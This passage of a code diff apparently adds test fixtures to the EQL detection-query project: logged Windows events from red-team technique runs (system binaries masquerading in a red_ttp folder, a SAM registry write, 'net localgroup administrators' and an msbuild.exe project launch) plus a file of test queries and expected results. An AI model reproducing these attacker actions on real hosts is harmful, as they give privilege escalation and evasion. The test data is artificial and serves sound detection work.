"modify", + "timestamp": 131509374446778110, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "SERVICES.EXE-01D9177B.pf", + "file_path": "C:\\Windows\\Prefetch\\SERVICES.EXE-01D9177B.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 71, + "subtype": "create", + "timestamp": 131509374446778110, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": 
"file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "csrss.exe", + "file_path": "C:\\workspace\\red_ttp\\csrss.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 72, + "subtype": "create", + "timestamp": 131509374446778110, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "csrss.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3948, + "ppid": 2256, + "process_name": "csrss.exe", + "process_path": "C:\\workspace\\red_ttp\\csrss.exe", + "serial_event_id": 73, + "subtype": "create", + "timestamp": 131509374446778110, + "unique_pid": 73, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3948, + "ppid": 2256, + "process_name": "csrss.exe", + "process_path": "C:\\workspace\\red_ttp\\csrss.exe", + "serial_event_id": 74, + "subtype": "terminate", + "timestamp": 131509374497010430, + "unique_pid": 73, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "csrss.exe", + "file_path": "C:\\workspace\\red_ttp\\csrss.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 75, + "subtype": "modify", + "timestamp": 131509374497010430, + 
"unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "smss.exe", + "file_path": "C:\\workspace\\red_ttp\\smss.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 76, + "subtype": "create", + "timestamp": 131509374497010430, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "CSRSS.EXE-006B4E4D.pf", + "file_path": "C:\\Windows\\Prefetch\\CSRSS.EXE-006B4E4D.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 77, + "subtype": "create", + "timestamp": 131509374497010430, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "smss.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3720, + "ppid": 2256, + "process_name": "smss.exe", + "process_path": "C:\\workspace\\red_ttp\\smss.exe", + "serial_event_id": 78, + "subtype": "create", + "timestamp": 131509374497010430, + "unique_pid": 78, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "bytes_written_count": 80, + "event_subtype_full": "registry_modify_event", + "event_type": "registry", + "event_type_full": "registry_event", + "key_path": "\\REGISTRY\\MACHINE\\SAM\\SAM\\DOMAINS\\Account\\Users\\000003E9\\F", + "key_type": "binary", + "opcode": 1, + "pid": 536, + "process_name": "lsass.exe", + "process_path": "C:\\Windows\\System32\\lsass.exe", + 
"registry_key": "\\REGISTRY\\MACHINE\\SAM\\SAM\\DOMAINS\\Account\\Users\\000003E9", + "registry_path": "\\REGISTRY\\MACHINE\\SAM\\SAM\\DOMAINS\\Account\\Users\\000003E9\\F", + "registry_type": "binary", + "registry_value": "F", + "serial_event_id": 79, + "timestamp": 131509374520566580, + "unique_pid": 9, + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 3720, + "ppid": 2256, + "process_name": "smss.exe", + "process_path": "C:\\workspace\\red_ttp\\smss.exe", + "serial_event_id": 80, + "subtype": "terminate", + "timestamp": 131509374547086750, + "unique_pid": 78, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "smss.exe", + "file_path": "C:\\workspace\\red_ttp\\smss.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 81, + "subtype": "modify", + "timestamp": 131509374547086750, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "SMSS.EXE-8C66D82D.pf", + "file_path": "C:\\Windows\\Prefetch\\SMSS.EXE-8C66D82D.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 82, + "subtype": "create", + "timestamp": 131509374547086750, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": 
"wininit.exe", + "file_path": "C:\\workspace\\red_ttp\\wininit.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 83, + "subtype": "create", + "timestamp": 131509374547086750, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "wininit.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1680, + "ppid": 2256, + "process_name": "wininit.exe", + "process_path": "C:\\workspace\\red_ttp\\wininit.exe", + "serial_event_id": 84, + "subtype": "create", + "timestamp": 131509374547086750, + "unique_pid": 84, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 1680, + "ppid": 2256, + "process_name": "wininit.exe", + "process_path": "C:\\workspace\\red_ttp\\wininit.exe", + "serial_event_id": 85, + "subtype": "terminate", + "timestamp": 131509374597163070, + "unique_pid": 84, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "wininit.exe", + "file_path": "C:\\workspace\\red_ttp\\wininit.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 86, + "subtype": "modify", + "timestamp": 131509374597163070, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + 
"event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "WININIT.EXE-F4D46129.pf", + "file_path": "C:\\Windows\\Prefetch\\WININIT.EXE-F4D46129.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 87, + "subtype": "create", + "timestamp": 131509374597163070, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "explorer.exe", + "file_path": "C:\\workspace\\red_ttp\\explorer.exe", + "opcode": 0, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 88, + "subtype": "create", + "timestamp": 131509374597163070, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "explorer.exe", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 1, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 4080, + "ppid": 2256, + "process_name": "explorer.exe", + "process_path": "C:\\workspace\\red_ttp\\explorer.exe", + "serial_event_id": 89, + "subtype": "create", + "timestamp": 131509374597163070, + "unique_pid": 89, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "f49c54c4997a0401db0f6640a6111c52", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 4080, + "ppid": 2256, + "process_name": "explorer.exe", + "process_path": "C:\\workspace\\red_ttp\\explorer.exe", + "serial_event_id": 90, + 
"subtype": "terminate", + "timestamp": 131509374647239400, + "unique_pid": 89, + "unique_ppid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_delete_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "explorer.exe", + "file_path": "C:\\workspace\\red_ttp\\explorer.exe", + "opcode": 2, + "pid": 2256, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 91, + "subtype": "modify", + "timestamp": 131509374647239400, + "unique_pid": 54, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "EXPLORER.EXE-854AF04C.pf", + "file_path": "C:\\Windows\\Prefetch\\EXPLORER.EXE-854AF04C.pf", + "opcode": 0, + "pid": 896, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 92, + "subtype": "create", + "timestamp": 131509374647239400, + "unique_pid": 16, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "21f73cd55626f0ec9fbce53eafbef128", + "opcode": 2, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2256, + "ppid": 1788, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 93, + "subtype": "terminate", + "timestamp": 131509374647239400, + "unique_pid": 54, + "unique_ppid": 53, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "5746bd7e255dd6a8afa06f7c42c1ba41", + "opcode": 2, + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 
1788, + "ppid": 420, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "serial_event_id": 94, + "subtype": "terminate", + "timestamp": 131509374647239400, + "unique_pid": 53, + "unique_ppid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "something.json", + "file_path": "C:\\workspace\\dev\\TestLogs\\something.json", + "opcode": 0, + "pid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 95, + "subtype": "create", + "timestamp": 131509374647239400, + "unique_pid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "file_create_event", + "event_type": "file", + "event_type_full": "file_event", + "file_name": "something.json", + "file_path": "C:\\workspace\\Libraries\\myapp\\myapp\\python\\myapp\\something.json", + "opcode": 0, + "pid": 420, + "process_name": "python.exe", + "process_path": "C:\\Python27\\python.exe", + "serial_event_id": 96, + "subtype": "create", + "timestamp": 131509374647239400, + "unique_pid": 48, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "authentication_id": 854482244, + "command_line": "net localgroup administrators findme2", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "63dd6fbaabf881385899fd39df13dce3", + "opcode": 1, + "original_file_name": "NET.exe", + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3608, + "ppid": 392, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "serial_event_id": 97, + "subtype": "create", + "timestamp": 131605904083494370, + "unique_pid": 750058, + "unique_ppid": 707545, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "authentication_id": 854482244, + 
"command_line": "C:\\Windows\\system32\\net1 localgroup administrators findme2", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3b6928bc39e5530cead1e99269e7b1ee", + "opcode": 1, + "original_file_name": "net1.exe", + "parent_process_name": "net.exe", + "parent_process_path": "C:\\Windows\\System32\\net.exe", + "pid": 1348, + "ppid": 3608, + "process_name": "net1.exe", + "process_path": "C:\\Windows\\System32\\net1.exe", + "serial_event_id": 98, + "subtype": "create", + "timestamp": 131605904083806370, + "unique_pid": 750059, + "unique_ppid": 750058, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "authentication_id": 13728872, + "command_line": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe tmp-file.csproj", + "event_subtype_full": "creation_event", + "event_type": "process", + "event_type_full": "process_event", + "md5": "4b736b85e5de65e572f28a91e31b99bf", + "opcode": 1, + "original_file_name": "MSBuild.exe", + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 860, + "ppid": 1196, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "serial_event_id": 75273, + "subtype": "create", + "timestamp": 131762381484502110, + "unique_pid": 75273, + "unique_ppid": 75248, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "event_subtype_full": "termination_event", + "event_type": "process", + "event_type_full": "process_event", + "exit_code": 0, + "md5": "4b736b85e5de65e572f28a91e31b99bf", + "opcode": 2, + "original_file_name": "MSBuild.exe", + "parent_process_name": "python.exe", + "parent_process_path": "C:\\Python27\\python.exe", + "pid": 860, + "ppid": 1196, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "serial_event_id": 75303, + "subtype": "terminate", + "timestamp": 
131762381493483680, + "unique_pid": 75273, + "unique_ppid": 75248, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "destination_address": "10.6.48.157", + "destination_port": 8000, + "event_subtype_full": "ipv4_connection_attempt_event", + "event_type": "network", + "event_type_full": "network_event", + "opcode": 12, + "pid": 860, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "protocol": "tcp", + "serial_event_id": 75304, + "source_address": "10.6.48.157", + "source_port": 52178, + "subtype": "outgoing", + "timestamp": 131762381493039760, + "unique_pid": 75273, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "destination_address": "10.6.48.157", + "destination_port": 8000, + "event_subtype_full": "ipv4_connection_attempt_event", + "event_type": "network", + "event_type_full": "network_event", + "mysterious_field": { + "num": 100, + "outer_cross_match": "s3-c-x-y", + "subarray": [ + { + "a": "s0-a", + "b": [ + "s0-b" + ], + "c": [ + { + "x": { + "y": "s0-c-x-y" + }, + "z": "s0-c0-x-z" + }, + { + "x": { + "y": "s0-c-x-y" + }, + "z": "s0-c1-x-z" + } + ], + "cross_match": "s0-c1-x-z" + }, + { + "a": "s1-a", + "b": [ + "s1-b" + ], + "c": [] + }, + { + "a": "s2-a", + "b": [ + "s2-b" + ], + "c": [] + }, + { + "a": "s3-a", + "b": [ + "s3-b" + ], + "c": [ + { + "x": { + "y": "s3-c-x-y" + }, + "z": "s3-c-x-z" + } + ] + } + ], + "this_is_for_testing_nested_data": "true" + }, + "opcode": 12, + "pid": 10000, + "process_name": "MSBuild.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe", + "protocol": "tcp", + "serial_event_id": 75305, + "source_address": "10.6.48.157", + "source_port": 52178, + "subtype": "outgoing", + "timestamp": 131762381493039760, + "unique_pid": 99999, + "user_domain": "vagrant", + "user_name": "vagrant" + } +] 
diff --git a/eql/etc/test_queries.toml b/eql/etc/test_queries.toml
new file mode 100644
index 0000000..833528a
--- /dev/null
+++ b/eql/etc/test_queries.toml
@@ -0,0 +1,1151 @@
+[queries.q000]
+query = 'process where serial_event_id = 1'
+expected_event_ids = [1]
+
+[queries.q001]
+query = 'process where serial_event_id < 4'
+expected_event_ids = [1, 2, 3]
+
+[queries.q002]
+query = 'process where true | head 6'
+expected_event_ids = [1, 2, 3, 4, 5, 6]
+
+[queries.q003]
+query = 'process where false'
+expected_event_ids = []
+
+[queries.q004]
+expected_event_ids = []
+query = 'process where missing_field != null'
+
+[queries.q005]
+expected_event_ids = [1, 2, 3, 4, 5]
+query = 'process where bad_field == null | head 5'
+
+[queries.q006]
+query = '''
+ process where process_name == "impossible name" or (serial_event_id < 4.5 and serial_event_id >= 3.1)
+'''
+expected_event_ids = [4]
+
+[queries.q007]
+tags = ["comparisons", "pipes"]
+query = '''
+process where serial_event_id <= 8 and serial_event_id > 7
+| filter serial_event_id == 8'''
+expected_event_ids = [8]
+
+[queries.q008]
+query = '''
+process where true
+| filter serial_event_id <= 10
+| filter serial_event_id > 6'''
+expected_event_ids = [7, 8, 9, 10]
+
+[queries.q009]
+query = '''
+process where true
+| filter serial_event_id <= 10
+| filter serial_event_id > 6
+| head 2'''
+expected_event_ids = [7, 8]
+
+[queries.q010]
+query = '''
+process where true
+| head 1000
+| filter serial_event_id <= 10
+| filter serial_event_id > 6
+| tail 2
+'''
+expected_event_ids = [9, 10]
+
+[queries.q011]
+query = '''
+process where serial_event_id<=8 and serial_event_id > 7
+'''
+expected_event_ids = [8]
+
+[queries.q012]
+note = "check that comparisons against null values return false"
+expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303]
+query = 'process where exit_code >= 0'
+
+[queries.q013]
+note = "check that comparisons against null values return false"
+expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303]
+query = 'process where 0 <= exit_code'
+
+[queries.q014]
+note = "check that comparisons against null values return false"
+expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303]
+query = 'process where exit_code <= 0'
+
+[queries.q015]
+note = "check that comparisons against null values return false"
+expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303]
+query = 'process where exit_code < 1'
+
+[queries.q016]
+note = "check that comparisons against null values return false"
+expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303]
+query = 'process where exit_code > -1'
+
+[queries.q017]
+note = "check that comparisons against null values return false"
+expected_event_ids = [58, 64, 69, 74, 80, 85, 90, 93, 94, 75303]
+query = 'process where -1 < exit_code'
+
+[queries.q018]
+note = "check that comparisons against null values return false"
+expected_event_ids = []
+query = '''
+process where not (exit_code > -1)
+ and serial_event_id in (58, 64, 69, 74, 80, 85, 90, 93, 94)
+| head 10
+'''
+
+[queries.q019]
+note = "check that comparisons against null values return false"
+expected_event_ids = [1, 2, 3, 4, 5, 6, 7]
+query = 'process where not (exit_code > -1) | head 7'
+
+[queries.q020]
+note = "check that comparisons against null values return false"
+expected_event_ids = [1, 2, 3, 4, 5, 6, 7]
+query = 'process where not (-1 < exit_code) | head 7'
+
+[queries.q021]
+query = 'process where exit_code > 0'
+expected_event_ids = []
+
+[queries.q022]
+query = 'process where exit_code < 0'
+expected_event_ids = []
+
+[queries.q023]
+query = 'process where 0 < exit_code'
+expected_event_ids = []
+
+[queries.q024]
+query = 'process where 0 > exit_code'
+expected_event_ids = []
+
+[queries.q025]
+query = 'process where (serial_event_id<=8 and serial_event_id > 7) and (opcode=3 and opcode>2)'
+expected_event_ids = [8]
+
+[queries.q026]
+query = 'process where (serial_event_id<9 and serial_event_id >= 7) or (opcode == pid)'
+expected_event_ids = [7, 8]
+
+[queries.q027]
+query = 'process where process_name == "VMACTHLP.exe" and unique_pid == 12 | filter true'
+expected_event_ids = [12]
+
+[queries.q028]
+query = '''
+process where process_name in ("python.exe", "SMSS.exe", "explorer.exe")
+| unique process_name'''
+expected_event_ids = [3, 34, 48]
+
+[queries.q029]
+query = '''
+process where process_name in ("python.exe", "smss.exe", "Explorer.exe")
+| unique length(process_name)'''
+expected_event_ids = [3, 34, 48]
+
+[queries.q030]
+query = '''
+process where process_name in ("python.exe", "smss.exe", "explorer.exe")
+| unique length(process_name) == length("python.exe")'''
+expected_event_ids = [3, 48]
+
+[queries.q031]
+query = '''
+process where process_name in ("Python.exe", "smss.exe", "explorer.exe")
+| unique process_name != "python.exe"'''
+expected_event_ids = [3, 48]
+
+[queries.q032]
+query = '''
+process where process_name in ("python.exe", "smss.exe", "explorer.exe")
+| unique process_name
+| head 2
+| tail 1'''
+expected_event_ids = [34]
+
+[queries.q033]
+query = '''
+process where process_name in ("python.exe", "smss.exe", "explorer.exe")
+| unique process_name
+| tail 2
+| head 1'''
+expected_event_ids = [34]
+
+[queries.q034]
+query = '''
+process where process_name in ("python.exe", "smss.exe")
+| unique process_name parent_process_name'''
+expected_event_ids = [3, 48, 50, 54, 78]
+
+[queries.q035]
+query = '''
+process where process_name in ("python.exe", "smss.exe")
+| unique process_name, parent_process_name'''
+expected_event_ids = [3, 48, 50, 54, 78]
+
+[queries.q036]
+query = '''
+process where process_name in ("python.exe", "smss.exe")
+| head 5
+| unique process_name parent_process_name'''
+expected_event_ids = [3, 48, 50, 54]
+
+[queries.q037]
+expected_event_ids = [57]
+query = '''
+registry where length(bytes_written_string_list) == 2 and bytes_written_string_list[1] == "EN"'''
+
+[queries.q038]
+query = '''
+registry where key_path == "*\\MACHINE\\SAM\\SAM\\*\\Account\\Us*ers\\00*03E9\\F"'''
+expected_event_ids = [79]
+
+[queries.q039]
+query = '''
+process where process_path == "*\\red_ttp\\wininit.*" and opcode in (0,1,2,3,4)'''
+expected_event_ids = [84, 85]
+
+[queries.q040]
+query = '''
+file where file_name == "csrss.exe" and opcode=0
+ and descendant of [process where opcode in (1,3) and process_name="cmd.exe"]
+'''
+expected_event_ids = [72]
+
+[queries.q041]
+query = '''
+process where opcode=1 and process_name == "csrss.exe"
+ and descendant of [file where file_name == "csrss.exe" and opcode=0]
+'''
+expected_event_ids = [73]
+
+[queries.q042]
+query = '''
+process where opcode=1 and process_name == "smss.exe"
+ and descendant of [
+ file where file_name == "csrss.exe" and opcode=0
+ and descendant of [
+ process where opcode in(1,3) and process_name="cmd.exe"
+ ]
+ ]
+'''
+expected_event_ids = [78]
+
+[queries.q043]
+query = '''
+file where file_path="*\\red_ttp\\winin*.*"
+ and opcode in (0,1,2) and user_name="vagrant"
+'''
+expected_event_ids = [83, 86]
+
+[queries.q044]
+query = '''
+file where file_name in ("wininit.exe", "lsass.exe") and opcode == 2
+'''
+expected_event_ids = [65, 86]
+
+[queries.q045]
+query = '''
+file where true
+| tail 3'''
+expected_event_ids = [92, 95, 96]
+
+[queries.q046]
+query = '''
+process where opcode in (1,3) and process_name in (parent_process_name, "SYSTEM")
+'''
+expected_event_ids = [2, 50, 51]
+
+[queries.q047]
+expected_event_ids = [92, 95, 96, 91]
+query = '''
+file where true
+| tail 4
+| sort file_path'''
+
+[queries.q048]
+expected_event_ids = [2, 1, 4, 3, 5]
+query = '''
+process where true
+| head 5
+| sort md5 event_subtype_full process_name'''
+
+[queries.q049]
+expected_event_ids = [2, 1, 4, 3, 5]
+query = '''
+process where true
+| head 5
+| sort md5 event_subtype_full null_field process_name'''
+
+[queries.q050]
+expected_event_ids = [2, 1, 4, 3, 5]
+query = '''
+process where true
+| head 5
+| sort md5, event_subtype_full, null_field, process_name'''
+
+[queries.q051]
+expected_event_ids = [2, 1]
+query = '''
+process where true
+| head 5
+| sort md5 event_subtype_full null_field process_name
+| head 2'''
+
+[queries.q052]
+expected_event_ids = [1, 2, 3, 4, 5]
+query = '''
+process where true
+| head 5
+| sort md5 event_subtype_full null_field process_name
+| sort serial_event_id'''
+
+[queries.q053]
+query = '''
+sequence [process where serial_event_id = 1] [process where serial_event_id = 2]'''
+expected_event_ids = [1, 2]
+
+[queries.q054]
+query = '''
+sequence [process where serial_event_id < 5] [process where serial_event_id = 5]'''
+expected_event_ids = [4, 5]
+
+[queries.q055]
+query = '''
+sequence [process where serial_event_id=1] by unique_pid [process where true] by unique_ppid'''
+expected_event_ids = [1, 2]
+
+[queries.q056]
+query = '''
+sequence [process where serial_event_id<3] by unique_pid [process where true] by unique_ppid'''
+expected_event_ids = [1, 2, 2, 3]
+
+[queries.q057]
+query = '''
+sequence
+ [file where event_subtype_full == "file_create_event"] by file_path
+ [process where opcode == 1] by process_path
+ [process where opcode == 2] by process_path
+ [file where event_subtype_full == "file_delete_event"] by file_path
+| head 4
+| tail 2'''
+expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75]
+
+[queries.q058]
+query = '''
+sequence with maxspan=1d
+ [file where event_subtype_full == "file_create_event"] by file_path
+ [process where opcode == 1] by process_path
+ [process where opcode == 2] by process_path
+ [file where event_subtype_full == "file_delete_event"] by file_path
+| head 4
+| tail 2'''
+expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75]
+
+[queries.q059]
+query = '''
+sequence with maxspan=1h
+ [file where event_subtype_full == "file_create_event"] by file_path
+ [process where opcode == 1] by process_path
+ [process where opcode == 2] by process_path
+ [file where event_subtype_full == "file_delete_event"] by file_path
+| head 4
+| tail 2'''
+expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75]
+
+[queries.q060]
+query = '''
+sequence with maxspan=1m
+ [file where event_subtype_full == "file_create_event"] by file_path
+ [process where opcode == 1] by process_path
+ [process where opcode == 2] by process_path
+ [file where event_subtype_full == "file_delete_event"] by file_path
+| head 4
+| tail 2'''
+expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75]
+
+[queries.q061]
+query = '''
+sequence with maxspan=10s
+ [file where event_subtype_full == "file_create_event"] by file_path
+ [process where opcode == 1] by process_path
+ [process where opcode == 2] by process_path
+ [file where event_subtype_full == "file_delete_event"] by file_path
+| head 4
+| tail 2'''
+expected_event_ids = [67, 68, 69, 70, 72, 73, 74, 75]
+
+[queries.q062]
+query = '''
+sequence with maxspan=0.5s
+ [file where event_subtype_full == "file_create_event"] by file_path
+ [process where opcode == 1] by process_path
+ [process where opcode == 2] by process_path
+ [file where event_subtype_full == "file_delete_event"] by file_path
+| head 4
+| tail 2'''
+expected_event_ids = []
+
+[queries.q063]
+query = '''
+sequence
+ [process where serial_event_id < 5]
+ [process where serial_event_id < 5]
+'''
+expected_event_ids = [1, 2, 2, 3, 3, 4]
+
+[queries.q064]
+query = '''
+sequence
+ [file where opcode=0 and file_name="svchost.exe"] by unique_pid
+ [process where opcode == 1] by unique_ppid
+'''
+expected_event_ids = [55, 56]
+
+[queries.q065]
+query = '''
+sequence
+ [file where opcode=0] by unique_pid
+ [file where opcode=0] by unique_pid
+| head 1'''
+expected_event_ids = [55, 61]
+
+[queries.q066]
+query = '''
+sequence
+ [file where opcode=0] by unique_pid
+ [file where opcode=0] by unique_pid
+| filter events[1].serial_event_id == 92'''
+expected_event_ids = [87, 92]
+
+[queries.q067]
+query = '''
+sequence
+ [file where opcode=0 and file_name="*.exe"] by unique_pid
+ [file where opcode=0 and file_name="*.exe"] by unique_pid
+until [process where opcode=5000] by unique_ppid
+| head 1'''
+expected_event_ids = [55, 61]
+
+[queries.q068]
+query = '''
+sequence
+ [file where opcode=0 and file_name="*.exe"] by unique_pid
+ [file where opcode=0 and file_name="*.exe"] by unique_pid
+until [process where opcode=1] by unique_ppid
+| head 1'''
+expected_event_ids = []
+
+[queries.q069]
+query = '''
+join
+ [file where opcode=0 and file_name="*.exe"] by unique_pid
+ [file where opcode=2 and file_name="*.exe"] by unique_pid
+until [process where opcode=1] by unique_ppid
+| head 1'''
+expected_event_ids = [61, 59]
+
+[queries.q070]
+query = '''
+join by user_name
+ [process where opcode in (1,3) and process_name="smss.exe"]
+ [process where opcode in (1,3) and process_name == "python.exe"]'''
+expected_event_ids = [78, 48]
+
+[queries.q071]
+query = '''
+join by unique_pid
+ [process where opcode=1]
+ [file where opcode=0 and file_name="svchost.exe"]
+ [file where opcode == 0 and file_name == "lsass.exe"]'''
+expected_event_ids = [54, 55, 61]
+
+[queries.q072]
+query = '''
